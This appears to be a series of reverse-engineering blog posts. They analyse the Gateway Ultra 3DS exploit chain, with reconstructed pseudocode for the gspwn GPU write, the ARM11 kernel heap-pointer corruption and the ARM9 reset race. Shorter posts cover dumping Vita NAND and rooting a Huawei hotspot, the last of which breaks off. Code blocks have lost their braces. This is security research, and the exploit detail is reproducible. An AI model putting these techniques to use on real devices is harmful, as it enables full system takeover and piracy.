Reversing Gateway Ultra Stage 3: Owning ARM9 Kernel

First, some background: the 3DS has two main processors. Last time, I went over how Gateway Ultra exploited the ARM11 processor. However, most of the interesting (from a security perspective) functionalities are handled by a separate ARM946 processor. The ARM9 processor is in charge of the initial system bootup, some system services, and most importantly all the cryptographic functions such as encryption/decryption and signature/verification. In this post, we will look at how to run (privileged) code on the ARM9 processor with privileged access to the ARM11 processor. Please note that this writeup is a work in progress as I have not completely figured out how the exploit works (only the main parts of it). Specifically there are a couple of things that I do not know if it is done for the sake of the exploit or if it is done purely for stability or obfuscation. From a developer’s perspective, it doesn’t matter because as long as you perform all the steps, you will achieve code execution. But from a hacker’s perspective, the information is not complete unless all aspects are known and understood. I am posting this now as-is because I do not know when I’ll have time to work on the 3DS again. However, when I do, I will update the post and hopefully clear up all confusion.


For simplicity in description, from this point on, I will use pointers and offset values specific to the 4.x kernel. However, the code is the same for all firmware versions.

void arm11_kernel_entry(void) // pointers specific to 4.x
  int (*sub_FFF748C4)(int, int, int, int) = 0xFFF748C4;

  __clrex(); // release any exclusive access
  memcpy(0xF3FFFF00, 0x08F01010, 0x1C);// copy GW specific data
  clear_framebuffer(); // clear screen and saves some GPU registers
  // ARM9 code copied to FCRAM 0x23F00000
  memcpy(0xF3F00000, ARM9_PAYLOAD, ARM9_PAYLOAD_LEN);
  // write function hook at 0xFFFF0C80
  memcpy(0xEFFF4C80, jump_table, FUNC_LEN);
  // write FW specific offsets to copied code buffer
  *(int *)(0xEFFF4C80 + 0x60) = 0xFFFD0000; // PDN regs
  *(int *)(0xEFFF4C80 + 0x64) = 0xFFFD2000; // PXI regs
  *(int *)(0xEFFF4C80 + 0x68) = 0xFFF84DDC; // where to return to from hook
  // patch function 0xFFF84D90 to jump to our hook
  *(int *)(0xFFF84DD4 + 0) = 0xE51FF004; // ldr pc, [pc, #-4]
  *(int *)(0xFFF84DD4 + 4) = 0xFFFF0C80; // jump_table + 0
  // patch reboot start function to jump to our hook
  *(int *)(0xFFFF097C + 0) = 0xE51FF004; // ldr pc, [pc, #-4]
  *(int *)(0xFFFF097C + 4) = 0x1FFF4C84; // jump_table + 4
  sub_FFF748C4(0, 0, 2, 0); // trigger reboot

// not called directly, offset determines jump
void jump_table(void)

void func_patch_hook(void)
  // data written from entry
  int pdn_regs;
  int pxi_regs;
  int (*func_hook_return)(void);

  // save context
  __asm__ ("stmfd sp!, {r0-r12,lr}")
  // TODO: Why is this needed?
  pxi_send(pxi_regs, 0);
  pxi_send(pxi_regs, 0x10000);
  // TODO: What does this do?
  *(char *)(pdn_regs + 0x230) = 2;
  for (i = 0; i < 16; i += 2); // busy spin
  *(char *)(pdn_regs + 0x230) = 0;
  for (i = 0; i < 16; i += 2); // busy spin
  // restore context and run the two instructions that were replaced
  __asm__ ("ldmfd sp!, {r0-r12,lr}\t\n"
           "ldr r0, =0x44836\t\n"
           "str r0, [r1]\t\n"
           "ldr pc, %0", func_hook_return);

// this is a patched version of function 0xFFFF097C
// stuff found in the original code are skipped
void reboot_func(void)
  ... // setup
  // disable all interrupts
  __asm__ ("mrs r0, cpsr\t\n"
           "orr r0, r0, #0x1C0\t\n"
           "msr cpsr_cx, r0" ::: "r0");
  while ( *(char *)0x10140000 & 1 ); // wait for powerup ready
  *(void **)0x2400000C = 0x23F00000; // our ARM9 payload

Memory Configurations

A quick side-note on the way that ARM11 talks to ARM9. There is a FIFO with a register interface called the PXI and is used to pass data to and from each processor. Additionally, most of the physical memory mappings are shared between the two processors. Data stored, for example, in the FCRAM or AXI WRAM can be seen by both processors (provided proper cache coherency). However, there is one region (physical 0×08000000 to 0×081000000) that only the ARM9 processor can see. ARM9 code runs in this region. Another thing to note is that the ARM9 processor only performs a one-to-one virtual memory addressing (aka physical addresses and virtual addresses are the same) but I have been told that it does have memory protection enabled.

ARM9 Process

The ARM9 processor only (ever) has one process running, Process9, which speaks with the kernel to handle commands from ARM11. Process9 has access to a special syscall 0x7B, which takes in a function pointer and executes it in kernel mode. This means that essentially, owning ARM9 usermode is enough to get kernel code execution without any additional exploits.

Exploit Setup

After doing some housekeeping, the first thing the second stage payload code does is copy the third stage ARM9 code to a known location in FCRAM. Next, it makes patches to two ARM11 kernel functions. First, it patches the function at 0xFFF84D90 (I believe this function performs the kernel reboot) to jump into a function hook early-on. Second, it patches the function at 0xFFFF097C (I believe this function is ran after the ARM11 processor resets) to jump into another function hook. These two hooks are the key to how the exploit works.

Soft Rebooting

The 3DS supports soft rebooting (resetting the processor state without clearing the memory) in order to switch modes (ex: for DS games) and presumably to enable entering and exiting sleep mode. I believe this is triggered at the end of the the exploit setup by calling the function at 0xFFF748C4. At some point in this function, the subroutine at 0xFFF84D90 is called, which runs the code in our first function hook before continuing the execution.

At the same time in the ARM9 processor, Process9 now waits for a special command, 0×44836 from PXI, in the function at 0x0807B97C. I believe that the first function hook in ARM11 sends a series to commands to put Process9 into function 0x0807B97C, however that is only a guess.

The ARM11 processor continues to talk with ARM9 through the PXI and at some point both agree on a shared buffer in FCRAM at 0×24000000 (EDIT: yellows8 says this is the FIRM header) where some information is stored. At 0x2400000C is a function pointer to what ARM9 should execute after the reset. Process9 verifies that this function pointer is in the ARM9 private memory region 0×08000000-0×08100000 (EDIT: I assume the FIRM header signature check also takes place at this point). ARM11 resets and spinlocks in the function at 0xFFFF097C to wait for ARM9 to finish its tasks and tell ARM11 what to do.

Process9 at this point uses SVC 0x7B to jump into some reset handler at 0x080FF600 in kernel mode. At the end of that function, the ARM9 kernel reads the pointer value at 0x2400000C and jumps to it.

Reset ToCTToU

The problem here is simple. Process9 checks that the data at 0x2400000C (which is FCRAM, shared by both processors) is a valid pointer to code in ARM9 private memory (that ARM11 cannot access). However, after the check passes and before the function pointer is used, ARM11 can overwrite the value to point to code in FCRAM and ARM9 will execute it when it resets. This time-of-check-to-time-of-use bug is made possible by patching the ARM11 function that runs after reset so that it can wait for the right signal and then quickly overwrite the data in FCRAM before ARM9 uses it.


I apologize for the vagueness and likely mistakes in parts. I hope that if I don’t have the time to finish this analysis, someone else can pick up where I left off. Specifically, there are a couple of main questions that I haven’t answered:

  1. What is the function at 0xFFF748C4, what do the arguments do, and how does it call into function 0xFFF84D90? I speculate that it’s a function that performs the reset, but a more precise description is needed.
  2. What is the purpose of the first function hook? Specifically why does it send 0 and 0×10000 through PXI and what does PDN register 0×230 do?
  3. How does Process9 enter function 0x0807B97C? I suspect that it may have something to do with the first function hook in ARM11.

I hope that either someone can answer these questions (as well as correct any mistakes I’ve made) or that I’ll have time in the future to continue this analysis. This will also be the end of my journey to reverse Gateway Ultra (but the next release may spark my interest again). I don’t particularly care about the later stages (I hear there’s a modified MIPS VM and timing based obfuscation) or how Gateway enforces DRM to make sure only their card is used. If I do any more reversing with the 3DS, it would be on the kernel and applications so I can make patches of my own instead of worrying about how Gateway does it.

At this point, the information should be enough for anyone to take complete control of the 3DS (<= 9.2.0). I believe that information on its own is amoral but it takes people to make it immoral. There’s no point in arguing if piracy is right or wrong or if making this information public would help or harm pirates. I am not here to ensure the 3DS thrives. I am not here to take business away from Gateway. I am not here to be a moral police. I am only here to make sure that information is available for those who thirst for knowledge as much as I do in a form that is as precise and accurate as I can make it.

Reversing Gateway Ultra Stage 2: Owning ARM11 Kernel

It’s been a couple of days since my initial analysis of Gateway Ultra, released last week to enable piracy on 3DS. I spent most of this time catching up on the internals of the 3DS. I can’t thank the maintainers of 3dbrew enough (especially yellows8, the master of 3DS reversing) for the amount of detailed and technical knowledge found on the wiki. The first stage was a warmup and did not require any specific 3DS knowledge to reverse. The problem with the second stage is that while it is easy to see the exploit triggered and code to run, the actual exploit itself was not as clear. I looked at all the function calls made and made a couple of hypothesis of where the vulnerability resided, and reversed each function to the end to test my hypothesis. Although there was many dead ends and false leads, the process of reversing all these functions solidified my understanding of the system.


As always, I like to post the reversed code first so those with more knowledge than me don’t have to read my verbose descriptions. I will explain the interesting parts afterwards. I am including the full code listing of the shellcode including parts that are irrelevant either because it is used as obfuscation, to provide stability, or as setup for later parts.

int memcpy(void *dst, const void *src, unsigned int len);
int GX_SetTextureCopy(void *input_buffer, void *output_buffer, unsigned int size, 
                      int in_x, int in_y, int out_x, int out_y, int flags);
int GSPGPU_FlushDataCache(void *addr, unsigned int len);
int svcSleepThread(unsigned long long nanoseconds);
int svcControlMemory(void **outaddr, unsigned int addr0, unsigned int addr1, 
                     unsigned int size, int operation, int permissions);

do_gspwn_copy (void *dst, unsigned int len, unsigned int check_val, int check_off)
    unsigned int result;

        memcpy (0x18401000, 0x18401000, 0x10000);
        GSPGPU_FlushDataCache (0x18402000, len);
        // src always 0x18402000
        GX_SetTextureCopy(0x18402000, dst, len, 0, 0, 0, 0, 8);
        GSPGPU_FlushDataCache (0x18401000, 16);
        GX_SetTextureCopy(dst, 0x18401000, 0x40, 0, 0, 0, 0, 8);
        memcpy(0x18401000, 0x18401000, 0x10000);
        result = *(unsigned int *)(0x18401000 + check_off);
    } while (result != check_val);

    return 0;

arm11_kernel_exploit_setup (void)
    unsigned int patch_addr;
    unsigned int *buffer;
    int i;
    int (*nop_func)(void);
    int *ipc_buf;
    int model;

    // part 1: corrupt kernel memory
    buffer = 0x18402000;
    // 0xFFFFFE0 is just stack memory for scratch space
    svcControlMemory(0xFFFFFE0, 0x18451000, 0, 0x1000, 1, 0); // free page
    patch_addr = *(int *)0x08F028A4;
    buffer[0] = 1;
    buffer[1] = patch_addr;
    buffer[2] = 0;
    buffer[3] = 0;
    // overwrite free pointer
    do_gspwn_copy(0x18451000, 0x10u, patch_addr, 4);
    // trigger write to kernel
    svcControlMemory(0xFFFFFE0, 0x18450000, 0, 0x1000, 1, 0);

    // part 2: obfuscation or trick to clear code cache
    for (i = 0; i < 0x1000; i++)
        buffer[i] = 0xE1A00000; // ARM NOP instruction
    buffer[i-1] = 0xE12FFF1E; // ARM BX LR instruction
    nop_func = *(unsigned int *)0x08F02894 - 0x10000; // 0x10000 below current code
    do_gspwn_copy(*(unsigned int *)0x08F028A0 - 0x10000, 0x10000, 0xE1A00000, 0);
    nop_func ();

    // part 3: get console model for future use (?)
    __asm__ ("mrc p15,0,%0,c13,c0,3\t\n"
             "add %0, %0, #128\t\n" : "=r" (ipc_buf));

    ipc_buf[0] = 0x50000;
    __asm__ ("mov r4, %0\t\n"
             "mov r0, %1\t\n"
             "ldr r0, [r0]\t\n"
             "svc 0x32\t\n" :: "r" (ipc_buf), "r" (0x3DAAF0) : "r0", "r4");

    if (ipc_buf[1])
        model = ipc_buf[2] & 0xFF;
        model = -1;
    *(int *)0x8F01028 = model;

    return 0;

// after running setup, run this to execute func in ARM11 kernel mode
int __attribute__((naked))
arm11_kernel_exploit_exec (int (*func)(int, int, int), int arg1, int arg2)
    __asm__ ("mov r5, %0\t\n" // R5 = 0x3D1FFC, not used. likely obfusction.
             "svc 8\t\n" // CreateThread syscall, corrupted, args not needed
             "bx lr\t\n" :: "r" (0x3D1FFC) : "r5");


The main vulnerability is actually still gspwn. Whereas in the first stage, it was used to overwrite (usually read-only) code from a CRO dynamic library to get userland code execution, it is now used to overwrite a heap free pointer so when the next memory page is freed, it would overwrite kernel memory.

3DS Memory Layout

To understand how the free pointer write corruption works, let’s first go over how the 3DS memory is laid out (in simple terms). You can get the full picture here, but I want to go over some key points. First, the “main” memory (used by applications and services) called the FCRAM is located at physical address 0×20000000 to 0×28000000. It is mapped in virtual memory in many places. First, the main application which is at around FCRAM 0x23xxxxxx (or higher if it is a system process or applet like the web browser) is mapped to 0×00100000 as read-only. Next we have some pages in the FCRAM 0x24xxxxxx region that can be mapped by the application on demand to virtual address 0x18xxxxxx through the syscall ControlMemory. Finally, the entire FCRAM is mapped in kernel 0xF0000000 – 0xF8000000 (this is for 4.1, different in other versions).

Another note about memory is that the ARM11 kernel is not located in the FCRAM, but in something called the AXI WRAM. The name is not important, but what is important is that it’s physical address 0x1FF80000 is mapped twice in kernel memory space. 0xFFF60000 is marked read-only executable and 0xEFF80000 is marked read-write non-executable. However, writing to 0xEFF80000 will allow you to execute the code at 0xFFF60000, which defeats the whole purpose of marking the pages non-executable. Since these mappings only apply in kernel mode, you would still need to perform a write to that address with kernel permissions.

ControlMemory Unchecked Write

The usual process for handling user controlled pointers in a syscall is to use the special ARM instructions LDRT and STRT, which performs the pointer dereference with user privileges in kernel mode. However, what if we overwrite a pointer that the developers did not think is user controlled? It would use the regular LDR/STR instructions and dereference with kernel privileges. The goal is achieved by the ControlMemory syscall along with gspwn. The ControlMemory syscall is used to allocate and free pages of memory from the heap region of the FCRAM. When it is called to free, like most heap allocators, certain pointers are stored in the newly freed memory block (to point to the next and previous free blocks). Like most heap allocators, it also performs “coalescing,” which means two free blocks will be combined to form a larger free block (and the pointers to and from it is updated accordantly).

The plan here is to free a block of memory, which places certain pointers in the freed block. This is usually safe since once the user frees the block, it is unmapped from the user virtual memory space and they cannot access the memory any more. However, we can with gspwn, so we overwrite the free pointer with gspwn to overwrite the code in the 0xEFF80000 region. And that is possible because the pointer dereference is done with kernel permissions because the pointers stored here is not normally user accessible.

The data stored in the freed region is as follows:

    int some_count;
    struct free_data *next_free_block;
    struct free_data *prev_free_block;
    int unk_C;
    int unk_10;
} free_data;

When the first ControlMemory call happens in the exploit, it frees FCRAM 0×24451000 and writes the free_data structure to it. We then use gspwn to overwrite next_free_block to point to the kernel code we want to overwrite. Next we call ControlMemory to free the page immediately before (FCRAM 0×24450000). This will coalesce the block with

((struct free_data *)0x24450000)->next_free_block = ((struct free_data *)0x24451000)->next_free_block;
((struct free_data *)0x24451000)->next_free_block->prev_free_block = (struct free_data *)0x24450000;

As you can see, we control next_free_block of 0×24451000 and therefore control the write.

… But we’re not done yet. The above pseudocode was an artist rendition of what happens. Obviously, physical addresses are not used here. The user region virtual address (0x18xxxxxx) is not used either. The pointers here are the kernel virtual address 0xF4450000 and 0xF4451000. Since we can only write the value 0xF4450000 (or on 9.2, it is 0xE4450000), this poses a problem. Ideally, we want to write some ARM instruction that allows us to jump to code we control (BX R0 for example), however, 0xF4450000 assembles to “vst4.8{d16-d19}, [r5], r0″ (don’t worry, I don’t know what that is either) and 0xE4450000 assembles to “strb r0, [r5], #-0″. Both of which can’t be used (obviously) to control code execution. Now of course, we can try another address and see if we get lucky and the address happens to compile to a branch instruction, but we are not lucky. None of the user mappable/unmappable regions would give us a branch.

Unaligned Code Corruption

Here is the clever idea. What if we stop thinking of the problem as: how do I write an instruction that gives us execution control? but instead as: how do I corrupt the code to control it? I don’t usually like to post assembly listings, but it is impossible to dodge ARM assembly if you made it this far.

A note to systems programmers: There is a feature of ARMv6 that the 3DS enabled called unaligned read/write. This means a pointer does NOT have to be word aligned. In other words, you are allowed to write 4 bytes arbitrary to any address including something like “0×1003″. Now if you’re not a systems designer and don’t know about the problem of unaligned reads/writes (C nicely hides this from you), don’t worry, it just means everything works as you expect it to.

Let’s take a look at an arbitrary syscall, CreateThread. The actual syscall doesn’t matter, we only care about the assembly code that it runs:

   0:	e52de004 	push	{lr}		; (str lr, [sp, #-4]!)
   4:	e24dd00c 	sub	sp, sp, #12
   8:	e58d4004 	str	r4, [sp, #4]
   c:	e58d0000 	str	r0, [sp]
  10:	e28d0008 	add	r0, sp, #8
  14:	eb001051 	bl	0x4160
  18:	e59d1008 	ldr	r1, [sp, #8]
  1c:	e28dd00c 	add	sp, sp, #12
  20:	e49df004 	pop	{pc}		; (ldr pc, [sp], #4)

How do we patch this to control code flow? What if we get rid of the “add” on line 0x1c? Then we have on line 0xc, *SP = R0 and on line 0×20, PC = *SP, and since we trivially control R0 in a syscall, we can pass in a function pointer and run it.

Now if we replace the code at 0×18 with either 0xF4450000 or 0xE4450000, another problem arises. Both of those instructions (and there may be others from other firmware versions) try to dereference R5, which we don’t control. However, what if we write 0xF4450000/0xE4450000 starting at 0x1B? It would now corrupt two instructions instead of just one, but both are “safe” instructions.

  14:	eb001051 	bl	0x4160
  18:	009d1008 	addseq	r1, sp, r8
  1c:	e2e44500 	rsc	r4, r4, #0, 10

The actual code that is there isn’t particularly useful/important, which is exactly what we want. We successfully patched the kernel to jump to our code with a single syscall. Now making SVC 8 with R0 pointing to some function would run it in ARM11 kernel mode.


Although some may call this exploit overly simple, I thought the way it was exploited was very novel. It involved overwriting pointers that are meant to be inaccessible to users, then a type confusion of pointer to ARM code, and finally abusing unaligned writes to corrupt instructions in a safe way. Next time, I hope to conclude this series by reversing the ARM9 kernel exploit (for those unfamiliar, the 3DS has two kernels, one for applications and one for security, ARM9 is the interesting one). I want to thank, again, sbJFn5r for providing me with various dumps.

Reversing Gateway Ultra First Stage (Part 2)

When we last left off, we looked at the ROP code that loaded a larger second-part of the payload. Now we will walk through what was loaded and how userland native code execution was achieved. I am still an amateur at 3DS hacking so I am sure to get some things wrong, so please post any corrections you have in the comments and I will update the post as needed.


Some of the hard coded addresses are inside the stack payload loaded by the first part from Launcher.dat (at 0x08F01000).

int GX_SetTextureCopy(void *input_buffer, void *output_buffer, unsigned int size, 
int in_x, int in_y, int out_x, int out_y, int flags);
int GSPGPU_FlushDataCache(void *addr, unsigned int len);
int svcSleepThread(unsigned long long nanoseconds);
void memcpy(void *dst, const void *src, unsigned int len);

// There are offsets and addresses specific to each FW version inside of 
// the first stage that is used by both the first and second stage payloads
struct // example for 4.1.0
    void (*payload_code)(void); // 0x009D2000
    unsigned int unk_4; // 0x252D3000
    unsigned int orig_code; // 0x1E5F8FFD
    void *payload_target; // 0x192D3000
    unsigned int unk_10; // 0xEFF83C97
    unsigned int unk_14; // 0xF0000000
    unsigned int unk_18; // 0xE8000000
    unsigned int unk_1C; // 0xEFFF4C80
    unsigned int unk_20; // 0xEFFE4DD4
    unsigned int unk_24; // 0xFFF84DDC
    unsigned int unk_28; // 0xFFF748C4
    unsigned int unk_2C; // 0xEFFF497C
    unsigned int unk_30; // 0x1FFF4C84
    unsigned int unk_34; // 0xFFFD0000
    unsigned int unk_38; // 0xFFFD2000
    unsigned int unk_3C; // 0xFFFD4000
    unsigned int unk_40; // 0xFFFCE000
} fw_specific_data;

void payload() // base at 0x08F01000
    int i;
    unsigned int kversion;
    struct fw_specific_data *data;
    int code_not_copied;

    // part 1, some setup
    *(int*)0x08000838 = 0x08F02B3C;
    svcSleepThread (0x400000LL);
    svcSleepThread (0x400000LL);
    svcSleepThread (0x400000LL);
    for (i = 0; i < 3; i++) // do 3 times to be safe
        GSPGPU_FlushDataCache (0x18000000, 0x00038400);
        GX_SetTextureCopy (0x18000000, 0x1F48F000, 0x00038400, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
        GSPGPU_FlushDataCache (0x18000000, 0x00038400);
        GX_SetTextureCopy (0x18000000, 0x1F4C7800, 0x00038400, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);

    kversion = *(unsigned int *)0x1FF80000; // KERNEL_VERSION register
    data = 0x08F02894; // buffer to store FW specific data

    // part 2, get kernel specific data from our buffer
    if (kversion == 0x02220000) // 2.34-0 4.1.0
        memcpy (data, 0x08F028D8, 0x44);
    else if (kversion == 0x02230600) // 2.35-6 5.0.0
        memcpy (data, 0x08F0291C, 0x44);
    else if (kversion == 0x02240000) // 2.36-0 5.1.0
        memcpy (data, 0x08F02960, 0x44);
    else if (kversion == 0x02250000) // 2.37-0 6.0.0
        memcpy (data, 0x08F029A4, 0x44);
    else if (kversion == 0x02260000) // 2.38-0 6.1.0
        memcpy (data, 0x08F029E8, 0x44);
    else if (kversion == 0x02270400) // 2.39-4 7.0.0
        memcpy (data, 0x08F02A2C, 0x44);
    else if (kversion == 0x02280000) // 2.40-0 7.2.0
        memcpy (data, 0x08F02A70, 0x44);
    else if (kversion == 0x022C0600) // 2.44-6 8.0.0
        memcpy (data, 0x08F02AB4, 0x44);

    // part 3, execute code
        // if the function has it's original code, we try again
        code_not_copied = *(unsigned int *)data->payload_code + data->orig_code == 0;
        // copy second stage to FCRAM
        memcpy (0x18410000, 0x08F02B90, 0x000021F0);
        // make sure data is written and cache flushed || attempted GW obfuscation
        memcpy (0x18410000, 0x18410000, 0x00010000);
        memcpy (0x18410000, 0x18410000, 0x00010000);
        GSPGPU_FlushDataCache (0x18410000, 0x000021F0);
        // copy the second stage code
        GX_SetTextureCopy (0x18410000, data->payload_target, 0x000021F0, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
        memcpy (0x18410000, 0x18410000, 0x00010000);
    } while (code_not_copied);

    (void(*)() 0x009D2000)();
    // I think it was originally data->payload_code but later they hard coded it 
    // for some reason


The first part, I’m not too sure about. I think it’s either some required housekeeping or needless calls to obfuscate the exploit (found later). I couldn’t find any documentation on the 0x1F4XXXXX region except that is it in the VRAM. (EDIT: plutoo tells me it’s the framebuffer. Likely the screen is cleared black for debugging or something.) I am also unsure of the use of setting 0×08000838 to some location in the payload that is filled with “0x002CAFE4″. In the second part, version specific information for each released kernel version is copied to a global space for use by both the first stage and the second stage exploit code. (This includes specific kernel addresses and stuff).

The meat of the exploit is an unchecked GPU DMA write that allows the attacker to overwrite read-only executable pages in memory. This is the same exploit used by smealum in his ninjhax and he gives a much better explanation of “gspwn” in his blog. In short, certain areas of the physical memory are mapped at some virtual address as read-only executable (EDIT: yellows8 tells me specifically, this is in a CRO, which is something like shared libraries for 3DS) but when the physical address of the same location is written to by the GPU, it does not go through the CPU’s MMU (since it is a different device) and can write to it. The need for thread sleep (and maybe the weird useless memcpys) is because the CPU’s various levels of cache needs some time to see the changes that it did not expect from the GPU.

The second stage of the payload is the ARM code copied from Launcher.dat (3.0.0) offset 0x1B90 for a length of 0x21F0 (remember to decrypt it using the “add”-pad stream cipher described in the first post).

Raw ROP Payload Annotated

It is a huge mess, but for those who are curious, here it is. The bulk of the code are useless obfuscation (for example, it would pop 9 registers full of junk data and then fill the same 9 registers with more junk data afterwards). However, the obfuscation is easy to get past if you just ignore everything except gadgets that do 1) memory loads, 2) memory stores, 3) set flags, or 4) function call. Every other gadget is useless. They also do this weird thing where they “memcpy” one part of the stack to another part (which goes past the current SP). However, comparing the two blocks of data (before and after the copy) shows nothing different aside from some garbage values.

Dumping the Vita NAND

When we last left off, I had spent an excess of 100 hours (I’m not exaggerating since that entire time I was working, I listened to This American Life and went through over a hundred one-hour episodes) soldering and tinkering with the Vita logic board to try to dump the eMMC. I said I was going to buy a eMMC socket from taobao (the socket would have let me clamp a eMMC chip down while pins stick out, allowing the pressure to create a connection) however, I found out that all the sellers of the eMMC socket from taobao don’t ship to the USA and American retailers sell the sockets for $300 (cheapest I could find). So I took another approach.

Packet Sniffing

My first hypothesis on why it is not working is that there’s some special initialization command that the eMMC requires. For example, CMD42 of the MMC protocol allows password protection on the chip. Another possibility was that the chip resets into boot mode, which the SD card reader doesn’t understand. To clear any doubts, I connected CLK, CMD, and DAT0 to my Saleae Logic clone I got from eBay.

Vita eMMC points connected to logic analyzer.

Vita eMMC points connected to logic analyzer.

As you can see from the setup, I had the right controller board attached so I can get a power indicator light (not required, but useful). I also took the power button out of the case and attached it directly. The battery must be attached for the Vita to turn on. Everything is Scotch-taped to the table so it won’t move around. Once all that is done, I captured the Vita’s eMMC traffic on startup.

First command sent to eMMC on startup

First command sent to eMMC on startup

After reading the 200 paged specifications on eMMC, I understood the protocol and knew what I was looking at. The very first command sent to the Vita is CMD0 with argument 0×00000000 (GO_IDLE_STATE). This is significant for two reasons. First, we know that the Vita does NOT use the eMMC’s boot features. The Vita does not have its first stage bootloader on the eMMC, and boots either from (most likely) an on-chip ROM or (much less likely) some other chip (that mystery chip on the other side maybe?). Second, it means that there’s no trickery; the eMMC is placed directly into Idle mode, which is what SD cards go into when they are inserted into a computer. This also means that the first data read from the eMMC is in the user partition (not boot partition), so the second or third stage loader must be in the user partition of the eMMC. For the unfamiliar, the user partition is the “normal” data that you can see at any point while the boot partition is a special partition only exposed in boot mode (and AFAIK, not supported by any USB SD card reader). Because I don’t see the boot partition used, I never bothered to try to dump it.


I tried a dozen times last week on two separate Vita logic boards trying to dump the NAND with no luck. Now that I’m on my third (and final) Vita, I decided to try something different. First, I did not remove the resistors sitting between the SoC and eMMC this time. This is because I wanted to capture the traffic (see above) and also because I am much better at soldering now and the tiny points doesn’t scare me anymore. Second, because of my better understanding of the MMC protocol (from the 200 page manual I read), I no longer attempted to solder DAT1-DAT3 because that takes more time and gives more chance of error due to bad connections. I only connected CLK, CMD, and DAT0. I know that on startup, the eMMC is placed automatically into 1-bit read mode and must be switched to 4-bit (DAT0-DAT3) or 8-bit (DAT0-DAT7) read mode after initialization. My hypothesis is that there must be an SD card reader that followed the specification’s recommendation and dynamically choose the bus width based on how many wires can be read correctly (I also guessed that most readers don’t do this because SD cards always have four data pins). To test this, I took a working SD card, and insulated the pins for DAT1-DAT3 with tape. I had three SD card readers and the third one worked! I know that that reader can operate in 1-bit mode, so I took it apart and connected it to the Vita (CLK, CMD, DAT0, and ground).

As you can see, more tape was used to secure the reader.

As you can see, more tape was used to secure the reader.

I plugged it into the computer and… nothing. I also see that the LED read indicator on the reader was not on and a multimeter shows that the reader was not outputting any power either. That’s weird. I then put a working SD card in and the LED light turned on. I had an idea. I took the SD card and insulated every pin except Vdd and Vss/GND (taped over every pin) and inserted the SD card into the reader. The LED light came on. I guess there’s an internal switch that gets turned on when it detects a card is inserted because it tries to draw power (I’m not hooking up Vdd/Vss to the Vita because that’s more wires and I needed a 1.8V source for the controller and it’s just a lot of mess; I’m using the Vita’s own voltage source to power the eMMC). I then turned on the Vita, and from the flashing LED read light, I knew it was successful.

LED is on and eMMC is being read

LED is on and eMMC is being read

Analyzing the NAND

Here’s what OSX has to say about the eMMC:

Product ID: 0×4082
Vendor ID: 0x1e3d (Chipsbrand Technologies (HK) Co., Limited)
Version: 1.00
Serial Number: 013244704081
Speed: Up to 480 Mb/sec
Manufacturer: ChipsBnk
Location ID: 0x1d110000 / 6
Current Available (mA): 500
Current Required (mA): 100
Capacity: 3.78 GB (3,779,067,904 bytes)
Removable Media: Yes
Detachable Drive: Yes
BSD Name: disk2
Partition Map Type: Unknown
S.M.A.R.T. status: Not Supported

I used good-old “dd” to copy the entire /dev/rdisk2 to a file. It took around one and a half hours to read (1-bit mode is very slow) the entire eMMC. I opened it up in a hex editor and as expected the NAND is completely encrypted. To verify, I ran a histogram on the dump and got the following result: 78.683% byte 0xFF and almost exactly 00.084% for every other byte. 0xFF blocks indicate free space and such an even distribution of all the other bytes means that the file system is completely encrypted. For good measure, I also ran “strings” on it and could not find any readable text. If we assume that there’s a 78.600% free space on the NAND (given 0xFF indicates free space and we have an even distribution of encrypted bytes in non-free space), that means that 808.70MB of the NAND is used. That’s a pretty hefty operating system in comparison to PSP’s 21MB flash0.

What’s Next

It wasn’t a surprise that the eMMC is completely encrypted. That’s what everyone suspected for a while. What would have been surprising is if it WASN’T encrypted, and that tiny hope was what fueled this project. We now know for a fact that modifying the NAND is not a viable way to hack the device, and it’s always good to know something for sure. For me, I learned a great deal about hardware and soldering and interfaces, so on my free time, I’ll be looking into other things like the video output, the mystery connector, the memory card, and the game cards. I’ve also sent the SoC and the two eMMC chips I removed to someone for decapping, so we’ll see how that goes once the process is done. Meanwhile, I’ll also work more with software and try some ideas I picked up from the WiiU 30C3 talk. Thanks again to everyone who contributed and helped fund this project!


In the sprit of openness, here’s all the money I’ve received and spent in the duration of this hardware hacking project:

Collected: $110 WePay, $327.87 PayPal, and 0.1BTC


Logic Analyzer: $7.85
Broken Vita logic board: $15.95
VitaTV x 2 (another for a respected hacker): $211.82
Rework station: $80
Broken 3G Vita: $31
Shipping for Chips to be decapped: $1.86

Total: $348.48 (I estimated/asked for $380)

I said I will donate the remaining money to EFF. I exchanged the 0.1BTC to USD and am waiting for mtgox to verify my account so I can withdraw it. $70 of donations will not be given to the EFF by the request of the donor(s). I donated $25 to the EFF on January 10, 2014, 9:52 pm and will donate the 0.1BTC when mtgox verifies my account (this was before I knew that EFF takes BTC directly).

Huawei E587 (T-Mobile 4G Sonic Hotspot): Information and rooting

Earlier this year, I got my hands on the T-Mobile 4G Sonic Hotspot and as always, had to tear it apart as soon as I got it. I never wrote about it because I didn’t find anything overly interesting, but now it’s the end of the year, and I need to clear some inventory from my brain. If anyone remembers my post on the (older) T-Mobile 4G Hotspot (sans “Sonic”), the main limitation of that device was that the processor is an obscure one that required some digging to get information on. Thankfully, the Sonic variety is much easier to break into.


I don’t usually do this, but as I couldn’t find any good snapshots of the insides of this device, I took it upon myself to produce some amateur shots. One thing I want to say about the insides is that I loved how the main board is broken into three parts and they’re sandwiched together to make the device small (but thick).

Device with faceplate removed.

Device with faceplate removed.


FreeScale MCIMX283CVM4B

Qualcomm MDM8220 modem

Qualcomm MDM8220 modem

Middle layer, containing various chips

Middle layer, containing various chips

The important information is that the device is ARM based (it even uses the same system-on-chip as older Kindles), and having a well documented SoC is always a plus. There isn’t an obvious debug serial port, but I would bet that there is one knowing how the FreeScale SoCs work. However, we don’t need to explore hardware hacking yet as the software is unexplored.


This was literally the easiest device I’ve ever rooted. I can honestly say that from opening the package (knowing nothing about the device) to getting a root shell took me about fifteen minutes. There was only one interface to the device and that’s the management webpage. My plan was to explore every location where I could pass input to the device (settings, HTTP POST requests, MicroSD file browser, etc) and basically just try things until I get a crash or something interesting. The first thing I’ve tried was the settings backup/restore feature. Creating a backup of the settings allows you to download a SQLite database containing the settings. A quick SQL dump of the settings showed me some interesting options that can’t be set directly from the web interface, including:

TelnetStatus int

